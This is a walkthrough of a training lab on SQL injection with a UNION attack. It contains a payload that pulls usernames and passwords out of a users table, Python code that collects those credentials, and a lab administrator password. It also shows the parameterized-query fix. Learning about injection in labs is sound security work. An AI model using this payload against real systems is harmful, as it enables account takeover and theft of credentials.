Lab: SQL injection UNION attack, retrieving data from other tables
This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application’s response, so you can use a UNION attack to retrieve data from other tables.
The database contains a different table called users, with columns called username and password.
To solve the lab, perform a SQL injection UNION attack that retrieves all usernames and passwords, and use the information to log in as the administrator user.
After you click on the ACCESS THE LAB button, it takes you to the lab website. As specified in the description above, this lab contains a SQL injection vulnerability in the product category filter, so before clicking on a category I turned on Burp Suite's proxy to intercept the traffic.
This is the GET request we are sending to the server. Notice I selected the Accessories category. I sent this to Repeater so I can experiment with the request more freely.
We know from the description that there is a table called users with two columns, username and password. All I did was pass those column names and that table name into the right place using SQL syntax, appending a UNION SELECT to the category parameter.
Notice our previous black text turned red, indicating that Burp has URL-encoded our SQL syntax. Without URL encoding, characters such as spaces and quotes would not survive the trip in the query string, and the server would not interpret our request as intended.
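The walkthrough above shows the payload only in screenshots, so here is the same attack worked through against a small in-memory SQLite stand-in for the lab's back end. This is an added example, not the lab's own code or the author's request: the table layout, the product rows and the credential values are constructed placeholders, and it assumes (as the lab's description implies) that the category query returns two string columns, so a two-column UNION SELECT lines up with it. It also shows why URL encoding matters and what happens when the column count does not match.

```python
import sqlite3
from urllib.parse import urlencode


def build_db():
    """Constructed stand-in for the lab database. Values are placeholders."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (name TEXT, category TEXT);
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO products VALUES ('Lamp', 'Accessories'), ('Hat', 'Gifts');
        INSERT INTO users VALUES ('administrator', 'admin-secret-placeholder'),
                                 ('wiener', 'peter-placeholder');
    """)
    return conn


def vulnerable_filter(conn, category):
    """The flaw: the user-controlled category is concatenated into the SQL."""
    sql = f"SELECT name, category FROM products WHERE category = '{category}'"
    return conn.execute(sql).fetchall()


def fixed_filter(conn, category):
    """Hardened form: a bound parameter, so the payload is just a literal string."""
    sql = "SELECT name, category FROM products WHERE category = ?"
    return conn.execute(sql, (category,)).fetchall()


# Closes the original string literal, appends a two-column UNION SELECT
# (matching the two columns the category query returns), and comments
# out the trailing quote with --.
UNION_PAYLOAD = "' UNION SELECT username, password FROM users--"


def encoded_query(category):
    """How the payload must travel in the GET query string (Burp does this for you)."""
    return urlencode({"category": category})


def union_succeeds(conn, category):
    """True if the injected query runs; a column-count mismatch raises an error."""
    try:
        vulnerable_filter(conn, category)
        return True
    except sqlite3.OperationalError:
        return False


def harvest_credentials(conn, category="Accessories"):
    """Rows that came from the users table rather than the products table."""
    rows = vulnerable_filter(conn, category + UNION_PAYLOAD)
    product_names = {name for (name,) in conn.execute("SELECT name FROM products")}
    return {user: pw for user, pw in rows if user not in product_names}


if __name__ == "__main__":
    db = build_db()
    print(encoded_query("Accessories" + UNION_PAYLOAD))
    print(harvest_credentials(db))           # the two users and their passwords
    print(fixed_filter(db, "Accessories" + UNION_PAYLOAD))   # [] : payload is inert
```

The interesting failure mode is the column count: `' UNION SELECT username FROM users--` (one column against a two-column query) is rejected by the database, which is why the earlier labs in this series spend time determining how many columns the original query returns before moving on to this one.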
Notice we got a response from the server with status code 200.
I selected the Render option from the response. The Render option renders the real UI of the website for our request instead of showing the raw HTML. Notice it returned the usernames administrator and wiener and their corresponding passwords.
administrator:kw4qlqndjpqxmymj0yll
I copied the password of the administrator user and logged in with that credential, just as the lab asked.
Done!